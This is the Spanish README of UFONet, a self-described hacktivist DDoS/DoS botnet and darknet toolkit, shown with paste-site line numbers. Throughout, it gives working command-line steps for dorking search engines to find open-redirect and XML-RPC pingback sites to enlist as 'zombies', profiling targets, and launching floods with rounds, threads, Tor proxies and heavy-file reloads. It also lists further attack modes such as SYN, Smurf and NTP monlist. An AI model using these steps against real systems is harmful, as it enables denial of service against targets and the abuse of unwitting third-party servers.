LEEME.txt 16 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Bienvenida a UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Información del proyecto
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ/Preguntas frecuentes
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Introducción
  26. ###############################
  27. UFONet - Es un conjunto de herramientas hacktivistas que permiten el lanzamiento coordinado
  28. de ataques DDoS y DoS, permitiendo combinar ambas técnicas en una sola ofensiva.
  29. También funciona como un DarkNET cifrada para publicar y recibir contenido
  30. mediante la creación de una red global de cliente/servidor basada en una
  31. arquitectura P2P de conexión directa.
  32. ###############################
  33. # Instalando
  34. ###############################
  35. UFONet funciona en muchas plataformas:
  36. Puedes tratar de de obtener automáticamente todas las librerías requeridas usando (como root):
  37. python3 setup.py
  38. Para instalación manual, intenta lo siguiente:
  39. sudo apt-get install -y --no-install-recommends libpython3.11-dev python3-pycurl python3-geoip python3-whois python3-cryptography python3-requests libgeoip1 libgeoip-dev
  40. python3 -m pip install --upgrade pip --no-warn-script-location --root-user-action=ignore
  41. python3 -m pip install pycurl --upgrade --root-user-action=ignore
  42. python3 -m pip install GeoIP python-geoip pygeoip requests whois scapy pycryptodomex duckduckgo-search --ignore-installed --root-user-action=ignore
  43. ###############################
  44. # Buscando 'zombies'
  45. ###############################
  46. UFONet puede buscar en los resultados de diferentes motores de búsqueda para encontrar posibles sitios
  47. web vulnerables a 'Open Redirect'.
  48. Generalmente los parámetros de las peticiones, suelen ser similares a los siguientes:
  49. 'page.php?url='
  50. 'check.cgi?url='
  51. 'checklink?uri='
  52. 'validator?uri='
  53. Por ejemplo, puedes comenzar una búsqueda con:
  54. ./ufonet -s 'page.php?url='
  55. O utilizando una lista de "dorks" que tengas en un fichero:
  56. ./ufonet --sd 'dorks.txt'
  57. Por defecto, UFONet utiliza un motor de búsqueda que se llama 'DuckDuckGo'. Pero puedes elegir uno diferente:
  58. ./ufonet -s 'page.php?url=' --se 'bing'
  59. También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
  60. ./ufonet -s 'page.php?url=' --sa
  61. Para controlar cuantos 'zombies' recibir como resultado puedes utilizar:
  62. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  63. O puedes hacer que la herramienta búsque de manera autómatica el mayor número posible de resultados
  64. (ésto puede tardar bastante tiempo!):
  65. ./ufonet --auto-search
  66. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  67. para ver si las urls son vulnerables.
  68. Do you want to check if the NEW possible zombies are valid? (Y/n)
  69. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  70. aquellas aplicaciones web que sean vulnerables.
  71. Do you want to update your army? (Y/n)
  72. Si respondes 'Y', tus nuevos 'zombies' se sumarán al fichero: zombies.txt
  73. -------------
  74. Ejemplos:
  75. + con detalle: ./ufonet -s 'page.php?url=' -v
  76. + con hilos: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  77. ###############################
  78. # Probando la botnet
  79. ###############################
  80. UFONet puede probar si tus 'zombies' son vulnerables y si pueden ser usados para tareas de ataque.
  81. Por ejemplo, abre 'botnet/zombies.txt' (u otro fichero) y crea una lista de posibles 'zombies'.
  82. Recuerdas que las urls de los 'zombies' deberían ser algo así:
  83. http://objetivo.com/check?uri=
  84. Después de eso, lanza:
  85. ./ufonet -t 'botnet/zombies.txt'
  86. Puedes hacer pruebas para descubrir 'zombies' relacionados con la vulnerabilidad XML-RPC Pingback, mediante:
  87. ./ufonet --test-rpc
  88. Para probar si tus 'zombies' siguen infectados (ésto puede tardar bastante tiempo!):
  89. ./ufonet --test-all
  90. Y para probar si tus 'zombies' siguen conectados a internet:
  91. ./ufonet --test-offline
  92. Finalmente, puedes ordenar a tus 'zombies' que te ataquen a ti mismo, para ver como responden a tus necesidades:
  93. ./ufonet --attack-me
  94. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  95. para ver si las urls son vulnerables.
  96. Do you want to check if the NEW possible zombies are valid? (Y/n)
  97. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  98. aquellas aplicaciones web que sean vulnerables.
  99. Do you want to update your army? (Y/n)
  100. Si respondes 'Y', tu fichero: "botnet/zombies.txt" será actualizado.
  101. -------------
  102. Examples:
  103. + con detalle: ./ufonet -t 'botnet/zombies.txt' -v
  104. + con proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  105. + con hilos: ./ufonet -t 'botnet/zombies.txt' --threads 50
  106. + probar botnet: ./ufonet --test-all
  107. + probar XML-RPCs: ./ufonet --test-rpc
  108. + buscar 'offlines': ./ufonet --test-offline
  109. + auto-atacarte: ./ufonet --attack-me
  110. ###############################
  111. # Inspeccionando un objetivo
  112. ###############################
  113. UFONet puede buscar el fichero más grande de tu objetivo analizándolo:
  114. ./ufonet -i http://target.com
  115. Puedes utilizar el resultado para hacer tus ataques más efectivos:
  116. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  117. -------------
  118. Ejemplo:
  119. +input:
  120. ./ufonet -i http://target.com
  121. +output:
  122. [...]
  123. +Image found: images/wizard.jpg
  124. (Size: 63798 Bytes)
  125. ------------
  126. +Style (.css) found: fonts.css
  127. (Size: 20448 Bytes)
  128. ------------
  129. +Webpage (.php) found: contact.php
  130. (Size: 2483 Bytes)
  131. ------------
  132. +Webpage (.php) found: about.php
  133. (Size: 1945 Bytes)
  134. ------------
  135. +Webpage (.php) found: license.php
  136. (Size: 1996 Bytes)
  137. ------------
  138. ================================================================================
  139. =Biggest File: http://target.com/images/wizard.jpg
  140. ================================================================================
  141. -------------
  142. ###############################
  143. # Abduciendo un objetivo
  144. ###############################
  145. UFONet puede entregarte bastante información interesante de tu objetivo:
  146. ./ufonet -x http://target.com
  147. -------------
  148. Ejemplo:
  149. +input:
  150. ./ufonet -x https://yahoo.com
  151. +output:
  152. [...]
  153. -Target URL: https://yahoo.com
  154. -IP : 206.190.39.42
  155. -IPv6 : OFF
  156. -Port : 443
  157. -Domain: yahoo.com
  158. -Bytes in : 550.09 KB
  159. -Load time: 9.10 seconds
  160. -Banner: ATS
  161. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  162. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  163. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  164. -Reports:
  165. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  166. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  167. [...]
  168. ---------
  169. [Info] Abduction finished... ;-)
  170. -------------
  171. ###############################
  172. # Atacando un objetivo
  173. ###############################
  174. UFONet puede atacar a tus objetivos de muchas maneras.
  175. Por ejemplo, introduce un objetivo para atacar con un número de rondas:
  176. ./ufonet -a http://target.com -r 10
  177. En el ejemplo, UFONet atacará el objetivo un número de 10 veces por cada 'zombie'. De manera que si tienes una lista
  178. de 1.000 'zombies', lanzará 1.000 'zombies' x 10 rondas = 10.000 peticiones al objetivo.
  179. Por defecto se aplicará únicamente 1 ronda.
  180. Además, puedes elegir el lugar para recargar el sitio el objetivo. Por ejemplo, una imagen grande, un fichero que ocupe
  181. mucho o una película de flash. En algunos escenarios donde los objetivos no utilizan sistemas de cache, ésto hará tu
  182. ataque más efectivo.
  183. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  184. -------------
  185. Examples:
  186. + con detalle: ./ufonet -a http://target.com -r 10 -v
  187. + con proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  188. + con un lugar ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  189. + con hilos: ./ufonet -a http://target.com -r 10 --threads 500
  190. ###############################
  191. # Ataques Especiales
  192. ###############################
  193. UFONet utiliza diferentes maneras para explotar las vulnerabilides 'Open Redirect'.
  194. Puedes usar UFONet para estresar la base de datos de tu objetivo mediante la petición de cadenas aleatorias válidas
  195. como si fueran búsquedas:
  196. ./ufonet -a http://target.com --db "search.php?q="
  197. También explota (por defecto) una vulnerabilidad en XML-RPC Pingback, generando peticiones que requieren respuesta e
  198. incrementando el procesamiento que requiere el objetivo.
  199. Puedes probar tu lista de zombies "X-RPCs" lanzando:
  200. ./ufonet --test-rpc
  201. ###############################
  202. # Ataques Extra
  203. ###############################
  204. - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
  205. - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
  206. - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
  207. - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
  208. - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
  209. - SPRAY: https://en.wikipedia.org/wiki/DRDOS
  210. - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
  211. - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
  212. - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
  213. - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
  214. - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
  215. - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
  216. - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
  217. - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
  218. - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
  219. - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
  220. - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
  221. Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo.
  222. ###############################
  223. # Actualizando
  224. ###############################
  225. UFONet implementa una opción para actualizarse automáticamente a la última versión estable.
  226. Para poder hacerlo tienes que haber clonado la herramienta desde el repositorio de GitHub.
  227. Lanza el siguiente comando para chequear si necesitas actualizaciones:
  228. ./ufonet --update
  229. Ésto actualizará la herramienta automáticamente borrando todos los ficheros del anterior paquete.
  230. ###############################
  231. # Generando un 'Blackhole'
  232. ###############################
  233. UFONet tiene algunas opciones P2P para compartir/mantener 'zombies' con otras 'naves madre".
  234. * Configura un servidor web con una carpeta llamada "ufonet", con las siguientes características:
  235. - localizado en /var/www/ufonet (por defecto en debian/ubuntu)
  236. - creado por el mismo usuario que ejecuta el "agujero negro" (blackhole)
  237. - que sea accesible desde http://tu-ip/ufonet/
  238. * Comienza el "agujero negro" con: ./ufonet --blackhole (or python2 blackhole.py)
  239. * Cualquiera que quiera conectarse con tu servidor necesita configurar --up-to/--down-from con la ip
  240. de tu servidor web...
  241. [!]ATENCIÓN : ésta función "AVANZADA" puede "NO" ser segura, ejecútala si realmente lo necesitas.
  242. Para lanzar un nuevo "agujero negro", utiliza:
  243. ./ufonet --blackhole
  244. ###############################
  245. # GUI/Web Interface
  246. ###############################
  247. Puedes controlar UFONet utilizando una interfaz Web. La herramienta implementa un servidor web en python
  248. conectado al núcleo para que tengas unas experiencia más amigable.
  249. Para lanzarla usa:
  250. ./ufonet --gui
  251. Ésto abrirá una pestaña (o una ventana nueva) en tu navegador por defecto, con todas las opciones de la herramienta
  252. más algunas "extra":
  253. - SHIP.NEWS: Permite leer las últimas "noticias" publicadas por la "nave madre"
  254. - SHIP.MISSIONS: Permite leer las últimas "misiones" publicadas por la "nave madre"
  255. - SHIP.STATS: Permite consultar las estadísticas de tu "nave"
  256. - SHIP.RANKING: Permite consultar tu posición en el "ranking"
  257. - SHIP.LINKS: Permite revisar los enlaces publicados por otras "naves"
  258. - SHIP.STREAMS: Permite revisar los "streams" (video/audio/directo) publicados por otras "naves"
  259. - SHIP.TV: Permite ver videos publicados por otras "naves"
  260. - SHIP GAMES: Permite revisar los "juegos" que contiene tu "nave madre"
  261. - SHIP.BROWSER: Permite navegar/surfear la Internet
  262. - SHIP.WARPS: Permite interactuar con una "nave madre" para subir/bajar 'zombies'
  263. - GLOBAL.BOARD: Permite enviar/recibir mensajes con una "nave madre" (un foro)
  264. - GLOBAL.GRID: Permite revisar las estadísticas de otras "naves"
  265. - GLOBAL.WARGAMES: Permite proponer y participar en algunos "juegos de guerra" reales
  266. - GLOBAL.RADAR: Permite revisar las localizaciones publicadas por otras "naves"
  267. - GLOBAL.NEWS: Permite leer noticias relacionadas con UFONet
  268. - [...]
  269. ###############################
  270. # Timelog
  271. ###############################
  272. --------------------------
  273. 25.08.2024 : v.1.9
  274. --------------------------
  275. --------------------------
  276. 02.03.2022 : v.1.8
  277. --------------------------
  278. --------------------------
  279. 14.07.2021 : v.1.7
  280. --------------------------
  281. --------------------------
  282. 17.08.2020 : v.1.6
  283. --------------------------
  284. --------------------------
  285. 08.06.2020 : v.1.5
  286. --------------------------
  287. --------------------------
  288. 01.02.2020 : v.1.4
  289. --------------------------
  290. --------------------------
  291. 10.03.2019 : v.1.3
  292. --------------------------
  293. --------------------------
  294. 03.02.2019 : v.1.2.1
  295. --------------------------
  296. --------------------------
  297. 31.12.2018 : v.1.2
  298. --------------------------
  299. --------------------------
  300. 26.09.2018 : v.1.1
  301. --------------------------
  302. --------------------------
  303. 08.03.2018 : v.1.0
  304. --------------------------
  305. --------------------------
  306. 14.07.2017 : v.0.9b
  307. --------------------------
  308. --------------------------
  309. 21.10.2016 : v.0.8b
  310. --------------------------
  311. --------------------------
  312. 17.08.2016 : v.0.7b
  313. --------------------------
  314. --------------------------
  315. 05.11.2015 : v.0.6b
  316. --------------------------
  317. --------------------------
  318. 24.05.2015 : v.0.5b
  319. --------------------------
  320. --------------------------
  321. 15.12.2014 : v.0.4b
  322. --------------------------
  323. --------------------------
  324. 27.09.2014 : v.0.3.1b
  325. --------------------------
  326. --------------------------
  327. 20.09.2014 : v.0.3b
  328. --------------------------
  329. --------------------------
  330. 22.06.2013 : v.0.2b
  331. --------------------------
  332. --------------------------
  333. 18.06.2013 : v.0.1b
  334. --------------------------
  335. ###############################
  336. # Gracias a
  337. ###############################
  338. - BP<3
  339. - UFo & Mandingo & Ikujam
  340. - Phineas Fisher ;-)
  341. - The Shadow Brokers (TSB) ;_)
  342. - World Wide Antifas >-)
  343. ------------------------
  344. ############